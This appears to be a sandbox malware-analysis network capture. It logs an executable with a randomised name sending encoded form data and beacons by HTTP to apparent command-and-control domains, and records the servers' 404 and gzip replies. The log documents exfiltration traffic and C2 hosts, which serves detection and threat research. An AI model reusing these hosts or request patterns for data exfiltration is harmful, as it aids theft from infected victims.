Aug 31, 2024 14:06:04.992862940 CEST	720	OUT	POST /90p1/ HTTP/1.1 Host: www.sssqqq07-22.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache Origin: http://www.sssqqq07-22.fun Referer: http://www.sssqqq07-22.fun/90p1/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 42 58 36 65 6b 76 48 6a 49 45 52 53 4d 59 67 32 46 6d 4b 58 2b 38 53 65 4b 79 49 33 74 73 72 46 5a 2b 79 57 45 56 2b 39 6d 59 47 54 6e 45 68 30 78 76 57 74 68 77 56 35 6d 59 6f 56 74 6d 74 79 6f 48 6c 48 63 54 6d 46 6f 51 6a 6d 58 71 31 41 31 30 72 2f 6d 6e 43 33 79 31 32 73 67 63 6d 2b 69 46 59 43 6e 37 6c 50 4c 32 68 61 75 32 34 30 4b 35 63 54 59 53 58 53 74 32 44 45 64 6f 68 6b 4e 35 65 34 34 57 6c 41 4c 49 48 78 51 6b 6d 34 62 4f 69 6e 4a 39 73 62 42 42 6d 75 52 65 2b 62 74 59 71 48 78 48 73 43 49 58 30 38 34 4e 65 31 57 2f 31 32 44 76 74 65 59 4a 38 6b 79 4a 61 4d 6a 76 51 45 55 63 55 56 56 49 4f 36 45 54 52 53 4d 37 35 44 57 57 34 3d Data Ascii: ZXzt1jdX=BX6ekvHjIERSMYg2FmKX+8SeKyI3tsrFZ+yWEV+9mYGTnEh0xvWthwV5mYoVtmtyoHlHcTmFoQjmXq1A10r/mnC3y12sgcm+iFYCn7lPL2hau240K5cTYSXSt2DEdohkN5e44WlALIHxQkm4bOinJ9sbBBmuRe+btYqHxHsCIX084Ne1W/12DvteYJ8kyJaMjvQEUcUVVIO6ETRSM75DWW4=
Aug 31, 2024 14:06:06.086366892 CEST	340	IN	HTTP/1.1 404 NOTOK Date: Sat, 31 Dec 2005 23:59:59 GMT Content-Type: text/html;charset=GB2312 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Data Raw: 0d 0a 3c 66 72 61 6d 65 73 65 74 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 20 62 6f 72 64 65 72 3d 22 30 22 20 72 6f 77 73 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 3e 0d 0a 3c 66 72 61 6d 65 20 6e 61 6d 65 3d 22 6d 61 69 6e 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 35 38 2e 32 32 30 2e 33 32 2e 32 31 30 3a 39 38 2f 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 61 75 74 6f 22 20 6e 6f 72 65 73 69 7a 65 3e 0d 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0d 0a 00 Data Ascii: <frameset framespacing="0" border="0" rows="0" frameborder="0"><frame name="main" src="http://58.220.32.210:98/" scrolling="auto" noresize></frameset>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	58128	45.113.201.77	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:06:07.535618067 CEST	10802	OUT	POST /90p1/ HTTP/1.1 Host: www.sssqqq07-22.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache Origin: http://www.sssqqq07-22.fun Referer: http://www.sssqqq07-22.fun/90p1/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 42 58 36 65 6b 76 48 6a 49 45 52 53 4d 59 67 32 46 6d 4b 58 2b 38 53 65 4b 79 49 33 74 73 72 46 5a 2b 79 57 45 56 2b 39 6d 65 65 54 6d 33 35 30 2b 6f 71 74 67 77 56 35 35 6f 6f 51 74 6d 74 72 6f 44 4a 35 63 54 36 56 6f 54 62 6d 46 5a 74 41 6b 78 4c 2f 73 6e 43 33 39 56 33 72 39 4d 6e 38 69 42 39 4c 6e 2f 46 50 4c 32 68 61 75 77 38 30 64 34 63 54 66 69 58 52 6f 32 44 44 5a 6f 68 4d 4e 35 47 47 34 57 70 36 49 38 4c 78 52 45 32 34 5a 38 4b 6e 43 39 73 5a 52 52 6d 32 52 65 79 45 74 63 44 2b 78 44 73 6b 49 51 63 38 79 4c 66 2f 47 4f 78 71 56 39 6c 79 43 4b 41 76 36 4c 71 43 6e 39 73 5a 63 65 77 7a 48 4a 75 47 66 52 30 48 51 59 52 31 42 78 32 41 2f 38 5a 46 4c 43 4c 47 69 44 35 5a 64 6e 61 32 6a 32 57 46 6b 2b 2f 4e 2f 74 56 73 69 7a 65 4a 4b 51 48 63 71 56 36 30 58 4a 4d 65 7a 78 69 4d 56 66 43 34 68 33 6a 2f 64 65 50 4a 4e 52 46 67 72 47 37 67 70 36 4e 36 6a 6e 6b 46 72 59 66 58 63 6e 53 56 39 69 49 6f 61 70 6e 42 78 44 4c 76 76 4e 4c 76 43 4e 52 30 67 64 62 78 39 39 75 77 52 [TRUNCATED] Data Ascii: ZXzt1jdX=BX6ekvHjIERSMYg2FmKX+8SeKyI3tsrFZ+yWEV+9meeTm350+oqtgwV55ooQtmtroDJ5cT6VoTbmFZtAkxL/snC39V3r9Mn8iB9Ln/FPL2hauw80d4cTfiXRo2DDZohMN5GG4Wp6I8LxRE24Z8KnC9sZRRm2ReyEtcD+xDskIQc8yLf/GOxqV9lyCKAv6LqCn9sZcewzHJuGfR0HQYR1Bx2A/8ZFLCLGiD5Zdna2j2WFk+/N/tVsizeJKQHcqV60XJMezxiMVfC4h3j/dePJNRFgrG7gp6N6jnkFrYfXcnSV9iIoapnBxDLvvNLvCNR0gdbx99uwRxzwshgFLn9Sy/kOu71q0+qo0gL4ePZRUPomxmQ9xHhCcIZo27V4iwlzi6EqXRyiwSDGbtST5NrMRB7Lj9PT5cloVJ/Ahe7Rf1A+sPdpQcgEGJIrVrPTbWdDRpZmUJrtoS1cfjMWKzKX46pKmmIV9Y1fkJuwOHYXhOkHgd+H3zbuVufQ8waqg6auaOMbKOCxNiGdCI9jRvpQQ+9iJpVUa7i2/0fCT9M1hrdDlgWeiS14OMWd5btgILhl1Ad+24IRcp9dMhr1V6I4IP7U/R1RD5jrtQPK9isaQNUbbpkfgkDr5V8I+4etUCrnHnw//CK3h8LN+YXbM4ZqCn5il8zqQHoWq5BQ4aCx1YP35dldiym9WiIQ616Z39rWS6fkO664qRQdeMhUr2tb4Pv6TTyVAr0iWyOz1dqKWV8s1qcyeg9FDcgryMsLgjotQL0LkCf9YDb8PoQ3lVEV8KPSox6ZfVdcwiaAEAcVlcP0oxFgGvNbTb8J5XTiZjVwDJWpNHOsLdK47t+y3dnc+HhuxDXDTHEh4P98SAPPDLZdtiInpUEAwQQS650Z1RxkFOE57dnH45nY9nZI80RU8IyqkBdeMosGrWwl3iLNKAKTsWlqvHaEGYSvVfmhc72qwU/THRQVACMUl064yYdcFPTCts5ZY9INIHWvE3LdzWL [TRUNCATED]
Aug 31, 2024 14:06:08.474332094 CEST	340	IN	HTTP/1.1 404 NOTOK Date: Sat, 31 Dec 2005 23:59:59 GMT Content-Type: text/html;charset=GB2312 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Data Raw: 0d 0a 3c 66 72 61 6d 65 73 65 74 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 20 62 6f 72 64 65 72 3d 22 30 22 20 72 6f 77 73 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 3e 0d 0a 3c 66 72 61 6d 65 20 6e 61 6d 65 3d 22 6d 61 69 6e 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 35 38 2e 32 32 30 2e 33 32 2e 32 31 30 3a 39 38 2f 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 61 75 74 6f 22 20 6e 6f 72 65 73 69 7a 65 3e 0d 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0d 0a 00 Data Ascii: <frameset framespacing="0" border="0" rows="0" frameborder="0"><frame name="main" src="http://58.220.32.210:98/" scrolling="auto" noresize></frameset>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	58129	45.113.201.77	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:06:10.220705032 CEST	424	OUT	GET /90p1/?ZXzt1jdX=MVS+namUa0UQavAdJ03s9uygERI+uY3eTsOcU3Wjrfb6xHYz5dyozzt8oos7zGJG9hFOZSWQuwu+QIVHqyXNg2+Ky1HzvorxqHxW6JBLA1lJwD0Ad7NFYWY=&fVU8=HRzx HTTP/1.1 Host: www.sssqqq07-22.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Aug 31, 2024 14:06:11.114590883 CEST	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 31 Aug 2024 12:06:22 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	58130	154.23.176.197	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:06:16.351615906 CEST	706	OUT	POST /qer4/ HTTP/1.1 Host: www.shipincheshi.skin Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache Origin: http://www.shipincheshi.skin Referer: http://www.shipincheshi.skin/qer4/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 5a 53 37 2b 2f 6b 48 34 6c 34 75 36 55 57 74 2f 6b 68 2f 4c 70 76 4b 55 6b 76 6f 67 56 49 66 52 2b 76 43 6e 4a 70 6b 6a 6f 75 65 4a 52 2b 63 76 62 74 41 48 32 52 37 51 73 78 50 70 72 52 75 36 46 79 47 46 4f 67 6c 6a 58 71 47 57 6e 47 2b 6c 58 41 54 45 72 77 55 50 65 51 79 50 74 45 6c 73 76 65 5a 49 30 59 41 41 2f 55 58 41 67 67 38 4f 55 57 68 52 66 76 35 59 30 61 2b 56 69 73 37 59 74 54 70 31 69 34 47 66 39 30 67 65 70 5a 31 46 33 78 50 33 43 61 4d 6b 4b 6a 69 70 35 5a 78 4b 67 53 4b 47 75 70 56 4d 6e 33 49 67 67 72 50 54 4c 47 49 77 65 30 54 57 4e 73 32 54 55 79 33 39 78 67 3d 3d Data Ascii: ZXzt1jdX=ZS7+/kH4l4u6UWt/kh/LpvKUkvogVIfR+vCnJpkjoueJR+cvbtAH2R7QsxPprRu6FyGFOgljXqGWnG+lXATErwUPeQyPtElsveZI0YAA/UXAgg8OUWhRfv5Y0a+Vis7YtTp1i4Gf90gepZ1F3xP3CaMkKjip5ZxKgSKGupVMn3IggrPTLGIwe0TWNs2TUy39xg==
Aug 31, 2024 14:06:17.326072931 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:16:59 GMT Server: Apache Upgrade: h2 Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4765 Content-Type: text/html; charset=utf-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c ff 77 db 46 72 ff b9 fe 2b b6 8c 13 52 0e 49 90 d4 77 89 52 ca 50 94 c4 8b 24 32 24 e5 ef 2e 1f 08 2e 49 58 20 00 03 4b 49 b4 e3 f7 92 f6 2e f1 b5 76 1c 5f d2 9c dd 26 cd 39 79 2f f6 4b 7a f6 f5 ae 4d 7c 49 9c fe 33 a2 24 ff d4 7f a1 b3 00 41 82 c0 82 a2 e9 84 ba 2b f4 24 11 8b d9 d9 cf cc ce cc ce 2c 01 c4 ff 76 29 93 2c 9c cb a6 50 8d d4 a5 c5 13 71 eb 1f e6 cb 8b 27 10 1c f1 3a 26 3c 12 6a bc a6 63 b2 e0 db 2c 2c 87 66 7c ed 4b 44 24 12 5e 3c f8 d3 f7 07 df 7f d6 ba 7d e7 e0 a3 cf 9e 7d 74 ef f0 f1 e3 38 67 5e b1 31 90 f9 3a 5e f0 69 4a 49 21 ba 0f 09 8a 4c b0 0c ec 64 45 94 cb 78 37 28 2b 15 45 92 94 1d 1f e2 da bd 74 d2 b4 38 d0 83 3b 85 5e e7 75 8c 4e 71 9d a6 92 52 6e a2 6b 9d 53 7a 08 8a a4 68 73 e8 a5 f1 f1 f1 f9 9e 0b 15 18 70 0e 45 a7 d4 5d 74 1a 6b 65 5e e6 83 c8 b7 8a a5 6d 4c 44 81 47 1b b8 81 7d 41 54 b3 1a 82 28 a1 89 bc 14 44 fe 75 51 d0 14 5d a9 10 74 8e 5f c5 a2 3f 88 74 5e d6 43 3a d6 c4 4a ef 10 75 5e ab 8a f2 1c 8a f4 36 ab 7c b9 2c ca 55 68 [TRUNCATED] Data Ascii: \wFr+RIwRP$2$..IX KI.v_&9y/KzM\|I3$A+$,v),Pq':&<jc,,f\|KD$^<}}t8g^1:^iJI!LdEx7(+Et8;^uNqRnkSzhspE]tke^mLDG}AT(DuQ]t_?t^C:Ju^6\|,UhGOt)w>Sxf;wXGWIq:@c+v"63#>M8Oual.KVZ(u "e)zcL"YcP_C^PQ@Q_sl?Lt8#\Me6k`S@gWJB5$aeRyOOUs{HsoBf&_]!kFeXz/i.J9Tdp^@&9Gh]tX 44kATf]\|i#NkUYZ(K,E:u,J\f"HVk mA+3}5:7%4aYJZ?>:\|w\|'ATFD%&"CT)0kxLKm8f]}B,aGJ]<.HdD~CYUecJ"l9&fM}R72Jm~)\|I0D+uAijk,5KO4=0`dOO
Aug 31, 2024 14:06:17.326092958 CEST	1236	IN	Data Raw: e9 58 ea 21 1a 2c 96 2f ea f3 0c b9 8d 55 ed e8 e5 a4 67 88 bf 10 6d 78 46 83 a8 47 91 c1 e2 e0 b2 fd 8e 56 81 49 6f c0 66 32 2a 8b db 73 20 21 09 09 35 51 2a 33 dd c8 5c b4 07 5b 59 db b4 7d 16 57 db 42 d8 93 ce 9c e6 a1 82 84 54 55 67 e7 34 a1 Data Ascii: X!,/UgmxFGVIof2s !5Q3\[Y}WBTUg4m^3sRY2yaHc8 sq;ov4^+iy;A_wAo0JbN-U_u^rmzvLP!, ywnH@cXa\|0<jm
Aug 31, 2024 14:06:17.326105118 CEST	448	IN	Data Raw: d1 b9 e8 9e 3a d0 71 8a 04 7f 60 05 b0 65 0b 7d 16 14 63 93 c8 b9 94 c0 aa 97 84 42 11 e5 09 e4 a8 ee 45 10 16 12 c6 f2 07 83 ff 85 2e e2 80 8c 99 c1 38 e1 bb 88 78 82 18 89 8d 81 e4 a2 85 e4 a2 39 aa 35 7a 3b 9f 09 2d 1a 91 73 6c 94 79 cd a6 26 Data Ascii: :q`e}cBE.8x95z;-sly&ueAq4PeTKBUbOD0-#j]k?j$gcb1d538>DqU[%%o"E\|gS#6~+Z7q]%M(m*v%y2L=:{8Vz8<
Aug 31, 2024 14:06:17.326263905 CEST	1236	IN	Data Raw: ca 8b 9b c4 b2 48 6d fa 38 8c 31 a9 28 5b e2 31 8d 9d c7 ba 4e ab fa e3 19 5b 83 bc 89 cb 99 a5 d1 cf ee 8e 9b f9 54 6e 48 57 84 10 cf ec 33 a4 25 1f 09 75 35 b3 9e 1a 12 2a 57 53 ea 98 1b 35 e0 7c 32 97 ce 16 8a 1b 89 e1 71 77 17 c2 51 02 cf a5 Data Ascii: Hm81([1N[TnHW3%u5*WS5\|2qwQL\zXt)h;Wr!QRzYt5\12W,GG}3sF![N$uJzst.,z-fnX9BCOTrz-"+He5Qbi=1l6K
Aug 31, 2024 14:06:17.326469898 CEST	838	IN	Data Raw: be c1 d7 9d 13 da 47 16 87 28 76 26 2c 91 bc 25 f2 9c 0d 8f 81 61 cc a2 75 5a 2c 35 8b 86 9f 32 86 6c 5b 68 9f 81 87 51 72 fb e6 fd 81 a6 db ad a2 02 5f 35 14 c4 40 d5 8b a6 f7 4c c3 a4 a1 c9 5e ae d5 f1 4e 2f cd f0 9a 50 33 4f 4c 9d 04 e9 a3 97 Data Ascii: G(v&,%auZ,52l[hQr_5@L^N/P3OLc =^LiUxp5E}^Eon8 A@?gp7F_Jj,\|0:~KaZ^=xacLr^w6[TOycA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	58131	154.23.176.197	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:06:18.898041010 CEST	726	OUT	POST /qer4/ HTTP/1.1 Host: www.shipincheshi.skin Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache Origin: http://www.shipincheshi.skin Referer: http://www.shipincheshi.skin/qer4/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 5a 53 37 2b 2f 6b 48 34 6c 34 75 36 47 46 31 2f 68 41 2f 4c 6c 66 4b 62 72 50 6f 67 63 6f 66 64 2b 76 65 6e 4a 74 30 4e 6f 39 36 4a 52 66 41 76 59 73 41 48 2f 42 37 51 34 68 4f 69 68 78 75 6c 46 7a 36 6e 4f 68 5a 6a 58 70 36 57 6e 43 79 6c 58 54 37 4c 71 67 55 4e 4c 41 79 4e 77 55 6c 73 76 65 5a 49 30 59 6c 62 2f 55 50 41 68 52 4d 4f 56 7a 64 53 58 50 35 58 69 4b 2b 56 31 38 37 63 74 54 70 62 69 35 61 35 39 32 6f 65 70 59 46 46 33 41 50 77 4d 71 4d 69 58 7a 6a 71 78 6f 49 69 6c 69 7a 49 6b 2f 46 41 71 44 42 41 6f 4e 65 4a 61 33 70 6e 4d 30 33 6c 51 72 2f 6e 5a 78 4b 30 71 6a 46 73 61 79 61 53 64 4a 49 4f 31 39 67 42 41 55 30 64 66 71 6f 3d Data Ascii: ZXzt1jdX=ZS7+/kH4l4u6GF1/hA/LlfKbrPogcofd+venJt0No96JRfAvYsAH/B7Q4hOihxulFz6nOhZjXp6WnCylXT7LqgUNLAyNwUlsveZI0Ylb/UPAhRMOVzdSXP5XiK+V187ctTpbi5a592oepYFF3APwMqMiXzjqxoIilizIk/FAqDBAoNeJa3pnM03lQr/nZxK0qjFsayaSdJIO19gBAU0dfqo=
Aug 31, 2024 14:06:19.813046932 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:17:01 GMT Server: Apache Upgrade: h2 Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4786 Content-Type: text/html; charset=utf-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c ff 77 db 54 96 ff 79 f9 2b de 9a 82 1d b0 2d db 49 9c 6f 4e 58 d7 71 12 43 62 1b db 29 2d b4 eb 23 4b cf b6 1a 59 52 a5 e7 7c 69 e9 39 b0 3b 03 cc 6e 4b 61 60 99 76 17 96 29 9c 43 39 b0 d3 ce ce 17 60 80 b2 ff 4c 9d a6 3f ed bf b0 f7 49 96 2d 4b 4f 8e 71 c1 99 59 e5 24 b1 9e ee bb ef 73 ef bb f7 be 7b 9f 25 a5 fe 7e b5 90 a9 9c 2b 66 51 93 b4 e4 95 27 52 f6 3f cc 8b 2b 4f 20 38 52 2d 4c 78 24 34 79 dd c0 64 39 b0 5d 59 8b cc 07 ba 97 88 44 64 bc f2 f0 8f df 3d fc ee e3 ce 8d 77 1f be ff f1 a3 f7 6f 1d dd bb 97 e2 ac 2b 0e 06 0a df c2 cb 01 5d ad a9 c4 08 20 41 55 08 56 80 9d a2 4a 8a 88 f7 c3 8a 5a 57 65 59 dd 0b 20 ae db cb 20 07 36 07 7a 70 cf a0 d3 bc 81 d1 33 5c af a9 a6 8a 07 e8 4a ef 94 1e 82 2a ab fa 22 7a 72 7a 7a 7a 69 e0 42 1d 06 5c 44 f1 a4 b6 8f ce 60 5d e4 15 3e 8c 02 1b 58 de c5 44 12 78 94 c7 6d 1c 08 a3 a6 dd 10 46 69 5d e2 e5 30 0a 6e 49 82 ae 1a 6a 9d a0 73 fc 06 96 82 61 64 f0 8a 11 31 b0 2e d5 07 87 68 f1 7a 43 52 16 51 6c b0 59 e3 45 51 52 1a [TRUNCATED] Data Ascii: \wTy+-IoNXqCb)-#KYR\|i9;nKa`v)C9`L?I-KOqY$s{%~+fQ'R?+O 8R-Lx$4yd9]YDd=wo+] AUVJZWeY 6zp3\J"zrzzziB\D`]>XDxmFi]0nIjsad1.hzCRQlYEQR1S\}j0i+'bH"J;.agcH{u:&VLb~^Cq>VYk.b=DC%=1f4S{qCU[Se5_.uLdH>XPuHj?tELXD"(A'p>I4pFu&]R"ju;]>/*"\|M.D{jHOMwwuHoBg]{FseXz:EQp@)5GhKUTt[X0uafC\|Vicnkp5YNK,U[6l;(O)c-M#_;Hq&\|fNd2lW@G=_>uu-KD<(h,5D<x:sfv9WPpi-GR;WkHH\?HC1,{%Cy0JI1=&ka!>u#S=tg"#lh]%MI00t]#[teaa?Fao3Y#La`II"
Aug 31, 2024 14:06:19.813074112 CEST	224	IN	Data Raw: 1d 4b 3d 44 87 c5 f2 71 7d 9e 21 b7 b9 aa 1d bf 9c 0c 0c f1 57 a2 0d df 68 10 f7 29 32 58 1c 3c b6 df d3 2a 30 19 0c d8 4c 46 a2 b4 bb 08 12 92 88 d0 94 64 91 e9 46 d6 a2 3d da ca da a5 1d b2 b8 3a 16 c2 81 74 e6 0c 0f 15 24 a4 aa 06 3b a7 89 ec Data Ascii: K=Dq}!Wh)2X<0LFdF=:t$;@zcE6YKe{/bMN/9/xQt{o*0nEr4hlvWVa1@vadnv0`v6b%?Dgy d,tkE"M
Aug 31, 2024 14:06:19.813086033 CEST	1236	IN	Data Raw: 83 79 36 6d 10 a6 e6 47 40 01 ab d6 d9 8e df 75 aa c4 fc 53 3f ca b4 f6 9a 12 c1 11 b3 2c 5a 84 88 4c 9d e3 47 c0 19 31 cd 72 46 8f 8c aa 1d 98 a1 c6 5b 0c 09 f6 a5 21 b5 90 27 88 0d 14 39 3e c5 a4 d9 d5 7f ff c4 09 af 5c 4c e7 11 96 71 0b 12 25 Data Ascii: y6mG@uS?,ZLG1rF[!'9>\Lq%J4s5)!WajThSh:&CX,CI=v7>owvnbgO@0e\|@MshoAm9zj76\|pNp{CqbOpxr{m[Ha 44jX
Aug 31, 2024 14:06:19.813100100 CEST	224	IN	Data Raw: e5 ee e8 ec 91 52 a4 5f e9 0d 3b 52 44 f7 81 48 c4 95 97 cf 5e 26 f1 8b e2 59 80 2b fa 53 f9 8e f1 72 79 0e 71 3b 1b 33 f2 4c 3b b9 be 16 e7 9a 69 6e 53 ae bf 50 d3 8b 6a 43 50 eb 22 da c5 ca f3 24 96 57 17 92 cf 97 ea e9 dd 73 46 7a 83 3b 3d f7 Data Ascii: R_;RDH^&Y+Sryq;3L;inSPjCP"$WsFz;=L 5Rh\|\|Ig+sA~o[6v9mVe\|8{VzY~v!btuiK:{}5'z:luNyyksBt
Aug 31, 2024 14:06:19.813208103 CEST	1236	IN	Data Raw: 7a 3b 26 d6 2f a9 cb 4c 45 30 55 04 ad 3e ea 75 50 f8 4f d4 e3 9b c9 9a 44 ed fc 24 0c 34 a3 aa 3b d2 09 8d 5d c6 86 41 2b fd 93 19 5b 87 5c 8a 2b 59 e5 d2 cf ee a2 db e5 6c 69 4c f7 84 b0 cf ec 33 a6 25 1f 0b 75 a3 b0 95 1d 13 2a d7 54 5b 98 9b Data Ascii: z;&/LE0U>uPOD$4;]A+[\+YliL3%u*T[4r+V$/ngv)7.pM4@.+\~}LlVDn.DaLT-B9&JB_OW/UsJR6SZ{WFs"lX(UN&'6
Aug 31, 2024 14:06:19.813426018 CEST	859	IN	Data Raw: 87 6e d9 97 2d 28 d1 21 50 9c fa ed a3 30 4e 1f 64 a8 ad e7 f9 96 7b 42 87 c8 e2 12 c5 c9 84 25 92 bf 44 be b3 e1 33 30 8c 59 b5 4f ab b5 83 aa e9 a7 8c 21 bb 16 3a 64 e0 71 94 dc bd 9f 7f a4 e9 f6 aa a8 c2 37 4c 05 31 50 0d a2 19 3c d3 31 69 eb Data Ascii: n-(!P0Nd{B%D30YO!:dq7L1P<1ikO3.4K'a4CNz!LOSZ',)C%k`_=gsh8#z'Icc2QCgjU}cK/erB MhxYUH`hWQZ~=xMQm4SL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	58132	154.23.176.197	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:06:21.513901949 CEST	10808	OUT	POST /qer4/ HTTP/1.1 Host: www.shipincheshi.skin Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache Origin: http://www.shipincheshi.skin Referer: http://www.shipincheshi.skin/qer4/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 5a 53 37 2b 2f 6b 48 34 6c 34 75 36 47 46 31 2f 68 41 2f 4c 6c 66 4b 62 72 50 6f 67 63 6f 66 64 2b 76 65 6e 4a 74 30 4e 6f 39 79 4a 52 74 49 76 62 4c 38 48 6c 42 37 51 6b 52 50 6c 68 78 75 6f 46 79 53 6a 4f 68 55 65 58 76 32 57 31 52 36 6c 47 79 37 4c 67 67 55 4e 54 77 79 51 74 45 6c 39 76 65 4a 45 30 59 56 62 2f 55 50 41 68 53 45 4f 53 6d 68 53 56 50 35 59 30 61 2b 6a 69 73 37 30 74 54 78 74 69 35 75 50 39 69 6b 65 6e 59 56 46 78 69 6e 77 4f 4b 4d 67 55 7a 6a 49 78 70 30 39 6c 69 76 79 6b 2f 59 76 71 45 42 41 74 4d 6a 65 65 7a 35 41 53 43 76 41 4c 36 66 4c 59 32 36 49 68 7a 74 76 5a 33 57 34 4f 49 51 43 2b 74 39 47 62 6c 67 57 63 66 67 33 32 46 70 46 42 4c 